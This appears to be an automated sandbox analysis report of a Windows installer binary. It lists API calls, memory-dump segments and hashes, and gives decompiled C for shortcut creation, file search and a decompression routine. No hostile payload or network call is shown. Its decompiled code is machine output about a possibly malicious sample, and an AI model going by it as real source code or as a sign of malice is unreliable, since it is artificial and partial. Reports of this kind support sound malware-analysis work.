                    0x00000000
                    0x00405ade
                    0x00405ac9
                    0x00405ad4
                    0x00405ada
                    0x00405adc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405adc
                    0x00405a95
                    0x00405a98
                    0x00000000
                    0x00000000
                    0x00405aa7
                    0x00405aa9
                    0x00405aab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405aab
                    0x00000000
                    0x00405ae1
                    0x00405a6c
                    0x00000000
                    0x00405a2a
                    0x00405a2f
                    0x00405a45
                    0x00405a4a
                    0x00405a4d
                    0x00405aea
                    0x00405aea
                    0x00405aee
                    0x00405af6
                    0x00405af6
                    0x00000000
                    0x00405aee
                    0x00405a57
                    0x00405ae5
                    0x00405ae5
                    0x00405ae8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ae8
                    0x00405a28
                    0x004059fb
                    0x004059ff
                    0x00000000
                    0x00000000
                    0x00405a01
                    0x00405a05
                    0x00000000
                    0x00000000
                    0x00405a07
                    0x00405a0b
                    0x00000000
                    0x00405a0d
                    0x00405a0d
                    0x00000000
                    0x00405a0d
                    0x00405a0b
                    0x00405b70
                    0x00405b7a
                    0x00405b86
                    0x00405b86
                    0x00000000

                    APIs
                    • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                    • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                    • GetWindowsDirectoryA.KERNEL32(qdrjldxxem,00000400), ref: 00405A7F
                    • SHGetSpecialFolderLocation.SHELL32(?,0041F887), ref: 00405ABB
                    • SHGetPathFromIDListA.SHELL32(0041F887,qdrjldxxem), ref: 00405AC9
                    • CoTaskMemFree.OLE32(0041F887), ref: 00405AD4
                    • lstrcatA.KERNEL32(qdrjldxxem,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                    • lstrlenA.KERNEL32(qdrjldxxem,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$qdrjldxxem
                    • API String ID: 900638850-3711807859
                    • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                    • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                    • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                    • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
                    • HeapAlloc.KERNEL32(00000000), ref: 1000100F
                    • RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
                    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
                    • HeapFree.KERNEL32(00000000), ref: 1000106F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Heap$Process$AllocCreateFree
                    • String ID: returning %p
                    • API String ID: 3034372947-1981732286
                    • Opcode ID: 696f6c78fc2ff42e68b41fd413f378f2a95a457db2cb454b327bb3ec9d1bd527
                    • Instruction ID: edeb632d065c36fcd7d74da81ee0192bee43c6a9b1077989599b8f3a27ea0a51
                    • Opcode Fuzzy Hash: 696f6c78fc2ff42e68b41fd413f378f2a95a457db2cb454b327bb3ec9d1bd527
                    • Instruction Fuzzy Hash: 3C116174A40304FFF710CF94CC49FA977B8EB49741F208048FA04AB295C6B5EE809B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E00402012() {
                    				void* _t44;
                    				intOrPtr* _t48;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				intOrPtr* _t54;
                    				signed int _t58;
                    				intOrPtr* _t59;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				int _t75;
                    				signed int _t81;
                    				intOrPtr* _t88;
                    				void* _t95;
                    				void* _t96;
                    				void* _t100;
                    
                    				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                    				_t96 = E004029E8(0xffffffdf);
                    				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                    				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                    				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                    				if(E0040548B(_t96) == 0) {
                    					E004029E8(0x21);
                    				}
                    				_t44 = _t100 + 8;
                    				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                    				if(_t44 < _t75) {
                    					L13:
                    					 *((intOrPtr*)(_t100 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t48 =  *((intOrPtr*)(_t100 + 8));
                    					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                    					if(_t95 >= _t75) {
                    						_t52 =  *((intOrPtr*)(_t100 + 8));
                    						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                    						_t54 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                    						_t81 =  *(_t100 - 0x14);
                    						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                    						if(_t58 != 0) {
                    							_t88 =  *((intOrPtr*)(_t100 + 8));
                    							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                    							_t81 =  *(_t100 - 0x14);
                    						}
                    						_t59 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                    						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                    							_t71 =  *((intOrPtr*)(_t100 + 8));
                    							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                    						}
                    						_t62 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                    						_t64 =  *((intOrPtr*)(_t100 + 8));
                    						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                    						if(_t95 >= _t75) {
                    							_t95 = 0x80004005;
                    							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                    								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                    								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                    							}
                    						}
                    						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                    						 *((intOrPtr*)( *_t66 + 8))(_t66);
                    					}
                    					_t50 =  *((intOrPtr*)(_t100 + 8));
                    					 *((intOrPtr*)( *_t50 + 8))(_t50);
                    					if(_t95 >= _t75) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L13;
                    					}
                    				}
                    				E00401423();
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                    				return 0;
                    			}

                    APIs
                    • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 123533781-501415292
                    • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                    • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                    • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                    • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,1000DD94,?,?,?,?), ref: 1000EE36
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 1000EE3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: a375a81c7ef1df14eea1922e879cb2e9f968cf6583de0dea8f14c4e18be49aa6
                    • Instruction ID: b090f88d11f7799a5d4f9b5517e089a18a004c10ac5bbc581c9ad52cab87e145
                    • Opcode Fuzzy Hash: a375a81c7ef1df14eea1922e879cb2e9f968cf6583de0dea8f14c4e18be49aa6
                    • Instruction Fuzzy Hash: 0FB09232044218EBEB422FD1DC49B583FA9EB0E7A2F00C010F60E44060CB7294909AA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E00402630(char __ebx, char* __edi, char* __esi) {
                    				void* _t19;
                    
                    				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                    					E00405889(__edi, _t6);
                    					_push(_t19 - 0x178);
                    					_push(__esi);
                    					E0040592B();
                    				} else {
                    					 *__edi = __ebx;
                    					 *__esi = __ebx;
                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                    				return 0;
                    			}

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                    • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                    • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                    • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: a0260415576aa95420f372983f58743769c0d120ca382f52acd45fed0c32641d
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 2AC15E322095930AEB5DD779843453EBEE29BA26F1317076FD8B2CB1D8FF20D5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 4a76e1c1ec7b5ebfa9efd7cb76e824ac0a7efc52ddd2614d983c74fda7de632f
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: A4C150322095930AEB5DD779843453EBEE29BA26F1317076ED8B2CB1D8FF20C524D620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E00406043(signed int __ebx, signed int* __esi) {
                    				signed int _t396;
                    				signed int _t425;
                    				signed int _t442;
                    				signed int _t443;
                    				signed int* _t446;
                    				void* _t448;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					_t446 = __esi;
                    					_t425 = __ebx;
                    					if( *(_t448 - 0x34) == 0) {
                    						break;
                    					}
                    					L55:
                    					__eax =  *(__ebp - 0x38);
                    					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    					__ecx = __ebx;
                    					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    					__ebx = __ebx + 8;
                    					while(1) {
                    						L56:
                    						if(__ebx < 0xe) {
                    							goto L0;
                    						}
                    						L57:
                    						__eax =  *(__ebp - 0x40);
                    						__eax =  *(__ebp - 0x40) & 0x00003fff;
                    						__ecx = __eax;
                    						__esi[1] = __eax;
                    						__ecx = __eax & 0x0000001f;
                    						if(__cl > 0x1d) {
                    							L9:
                    							_t443 = _t442 | 0xffffffff;
                    							 *_t446 = 0x11;
                    							L10:
                    							_t446[0x147] =  *(_t448 - 0x40);
                    							_t446[0x146] = _t425;
                    							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                    							L11:
                    							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                    							_t446[0x26ea] =  *(_t448 - 0x30);
                    							E004067B2( *(_t448 + 8));
                    							return _t443;
                    						}
                    						L58:
                    						__eax = __eax & 0x000003e0;
                    						if(__eax > 0x3a0) {
                    							goto L9;
                    						}
                    						L59:
                    						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                    						__ebx = __ebx - 0xe;
                    						_t94 =  &(__esi[2]);
                    						 *_t94 = __esi[2] & 0x00000000;
                    						 *__esi = 0xc;
                    						while(1) {
                    							L60:
                    							__esi[1] = __esi[1] >> 0xa;
                    							__eax = (__esi[1] >> 0xa) + 4;
                    							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                    								goto L68;
                    							}
                    							L61:
                    							while(1) {
                    								L64:
                    								if(__ebx >= 3) {
                    									break;
                    								}
                    								L62:
                    								if( *(__ebp - 0x34) == 0) {
                    									goto L182;
                    								}
                    								L63:
                    								__eax =  *(__ebp - 0x38);
                    								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    								__ecx = __ebx;
                    								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    								__ebx = __ebx + 8;
                    							}
                    							L65:
                    							__ecx = __esi[2];
                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                    							__ebx = __ebx - 3;
                    							_t108 = __ecx + 0x407374; // 0x121110
                    							__ecx =  *_t108;
                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                    							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                    							__ecx = __esi[1];
                    							__esi[2] = __esi[2] + 1;
                    							__eax = __esi[2];
                    							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                    							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                    								goto L64;
                    							}
                    							L66:
                    							while(1) {
                    								L68:
                    								if(__esi[2] >= 0x13) {
                    									break;
                    								}
                    								L67:
                    								_t119 = __esi[2] + 0x407374; // 0x4000300
                    								__eax =  *_t119;
                    								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                    								_t126 =  &(__esi[2]);
                    								 *_t126 = __esi[2] + 1;
                    							}
                    							L69:
                    							__ecx = __ebp - 8;
                    							__edi =  &(__esi[0x143]);
                    							 &(__esi[0x148]) =  &(__esi[0x144]);
                    							__eax = 0;
                    							 *(__ebp - 8) = 0;
                    							__eax =  &(__esi[3]);
                    							 *__edi = 7;
                    							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                    							if(__eax != 0) {
                    								L72:
                    								 *__esi = 0x11;
                    								while(1) {
                    									L180:
                    									_t396 =  *_t446;
                    									if(_t396 > 0xf) {
                    										break;
                    									}
                    									L1:
                    									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                    										case 0:
                    											L101:
                    											__eax = __esi[4] & 0x000000ff;
                    											__esi[3] = __esi[4] & 0x000000ff;
                    											__eax = __esi[5];
                    											__esi[2] = __esi[5];
                    											 *__esi = 1;
                    											goto L102;
                    										case 1:
                    											L102:
                    											__eax = __esi[3];
                    											while(1) {
                    												L105:
                    												__eflags = __ebx - __eax;
                    												if(__ebx >= __eax) {
                    													break;
                    												}
                    												L103:
                    												__eflags =  *(__ebp - 0x34);
                    												if( *(__ebp - 0x34) == 0) {
                    													goto L182;
                    												}
                    												L104:
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                    												__ecx = __ebx;
                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    												__ebx = __ebx + 8;
                    												__eflags = __ebx;
                    											}
                    											L106:
                    											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                    											__eax = __eax &  *(__ebp - 0x40);
                    											__ecx = __esi[2];
                    											__eax = __esi[2] + __eax * 4;
                    											__ecx =  *(__eax + 1) & 0x000000ff;
                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                    											__ecx =  *__eax & 0x000000ff;
                    											__eflags = __ecx;
                    											if(__ecx != 0) {
                    												L108:
                    												__eflags = __cl & 0x00000010;
                    												if((__cl & 0x00000010) == 0) {
                    													L110:
                    													__eflags = __cl & 0x00000040;
                    													if((__cl & 0x00000040) == 0) {
                    														goto L125;
                    													}
                    													L111:
                    													__eflags = __cl & 0x00000020;
                    													if((__cl & 0x00000020) == 0) {
                    														goto L9;
                    													}
                    													L112:
                    													 *__esi = 7;
                    													goto L180;
                    												}
                    												L109:
                    												__esi[2] = __ecx;
                    												__esi[1] = __eax;
                    												 *__esi = 2;
                    												goto L180;
                    											}
                    											L107:
                    											__esi[2] = __eax;
                    											 *__esi = 6;
                    											goto L180;
                    										case 2:
                    											L113:
                    											__eax = __esi[2];
                    											while(1) {
                    												L116:
                    												__eflags = __ebx - __eax;
                    												if(__ebx >= __eax) {
                    													break;
                    												}
                    												L114:
                    												__eflags =  *(__ebp - 0x34);
                    												if( *(__ebp - 0x34) == 0) {
                    													goto L182;
                    												}
                    												L115:
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                    												__ecx = __ebx;
                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    												__ebx = __ebx + 8;
                    												__eflags = __ebx;
                    											}
                    											L117:
                    											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                    											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                    											__ecx = __eax;
                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    											__ebx = __ebx - __eax;
                    											__eflags = __ebx;
                    											__eax = __esi[4] & 0x000000ff;
                    											__esi[3] = __esi[4] & 0x000000ff;
                    											__eax = __esi[6];
                    											__esi[2] = __esi[6];
                    											 *__esi = 3;
                    											goto L118;
                    										case 3:
                    											L118:
                    											__eax = __esi[3];
                    											while(1) {
                    												L121:
                    												__eflags = __ebx - __eax;
                    												if(__ebx >= __eax) {
                    													break;
                    												}
                    												L119:
                    												__eflags =  *(__ebp - 0x34);
                    												if( *(__ebp - 0x34) == 0) {
                    													goto L182;
                    												}
                    												L120:
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                    												__ecx = __ebx;
                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    												__ebx = __ebx + 8;
                    												__eflags = __ebx;
                    											}
                    											L122:
                    											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                    											__eax = __eax &  *(__ebp - 0x40);
                    											__ecx = __esi[2];
                    											__eax = __esi[2] + __eax * 4;
                    											__ecx =  *(__eax + 1) & 0x000000ff;
                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                    											__ecx =  *__eax & 0x000000ff;
                    											__eflags = __cl & 0x00000010;
                    											if((__cl & 0x00000010) == 0) {
                    												L124:
                    												__eflags = __cl & 0x00000040;
                    												if((__cl & 0x00000040) != 0) {
                    													goto L9;
                    												}
                    												L125:
                    												__esi[3] = __ecx;
                    												__ecx =  *(__eax + 2) & 0x0000ffff;
                    												__esi[2] = __eax;
                    												goto L180;
                    											}
                    											L123:
                    											__esi[2] = __ecx;
                    											__esi[3] = __eax;
                    											 *__esi = 4;
                    											goto L180;
                    										case 4:
                    											L126:
                    											__eax = __esi[2];
                    											while(1) {
                    												L129:
                    												__eflags = __ebx - __eax;
                    												if(__ebx >= __eax) {
                    													break;
                    												}
                    												L127:
                    												__eflags =  *(__ebp - 0x34);
                    												if( *(__ebp - 0x34) == 0) {
                    													goto L182;
                    												}
                    												L128:
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                    												__ecx = __ebx;
                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    												__ebx = __ebx + 8;
                    												__eflags = __ebx;
                    											}
                    											L130:
                    											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                    											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                    											__ecx = __eax;
                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    											__ebx = __ebx - __eax;
                    											__eflags = __ebx;
                    											 *__esi = 5;
                    											goto L131;
                    										case 5:
                    											L131:
                    											__eax =  *(__ebp - 0x30);
                    											__edx = __esi[3];
                    											__eax = __eax - __esi;
                    											__ecx = __eax - __esi - 0x1ba0;
                    											__eflags = __eax - __esi - 0x1ba0 - __edx;
                    											if(__eax - __esi - 0x1ba0 >= __edx) {
                    												__ecx = __eax;
                    												__ecx = __eax - __edx;
                    												__eflags = __ecx;
                    											} else {
                    												__esi[0x26e8] = __esi[0x26e8] - __edx;
                    												__ecx = __esi[0x26e8] - __edx - __esi;
                    												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                    											}
                    											__eflags = __esi[1];
                    											 *(__ebp - 0x20) = __ecx;
                    											if(__esi[1] != 0) {
                    												L135:
                    												__edi =  *(__ebp - 0x2c);
                    												do {
                    													L136:
                    													__eflags = __edi;
                    													if(__edi != 0) {
                    														goto L152;
                    													}
                    													L137:
                    													__edi = __esi[0x26e8];
                    													__eflags = __eax - __edi;
                    													if(__eax != __edi) {
                    														L143:
                    														__esi[0x26ea] = __eax;
                    														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                    														__eax = __esi[0x26ea];
                    														__ecx = __esi[0x26e9];
                    														__eflags = __eax - __ecx;
                    														 *(__ebp - 0x30) = __eax;
                    														if(__eax >= __ecx) {
                    															__edi = __esi[0x26e8];
                    															__edi = __esi[0x26e8] - __eax;
                    															__eflags = __edi;
                    														} else {
                    															__ecx = __ecx - __eax;
                    															__edi = __ecx - __eax - 1;
                    														}
                    														__edx = __esi[0x26e8];
                    														__eflags = __eax - __edx;
                    														 *(__ebp - 8) = __edx;
                    														if(__eax == __edx) {
                    															__edx =  &(__esi[0x6e8]);
                    															__eflags = __ecx - __edx;
                    															if(__ecx != __edx) {
                    																__eax = __edx;
                    																__eflags = __eax - __ecx;
                    																 *(__ebp - 0x30) = __eax;
                    																if(__eax >= __ecx) {
                    																	__edi =  *(__ebp - 8);
                    																	__edi =  *(__ebp - 8) - __eax;
                    																	__eflags = __edi;
                    																} else {
                    																	__ecx = __ecx - __eax;
                    																	__edi = __ecx;
                    																}
                    															}
                    														}
                    														__eflags = __edi;
                    														if(__edi == 0) {
                    															goto L183;
                    														} else {
                    															goto L152;
                    														}
                    													}
                    													L138:
                    													__ecx = __esi[0x26e9];
                    													__edx =  &(__esi[0x6e8]);
                    													__eflags = __ecx - __edx;
                    													if(__ecx == __edx) {
                    														goto L143;
                    													}
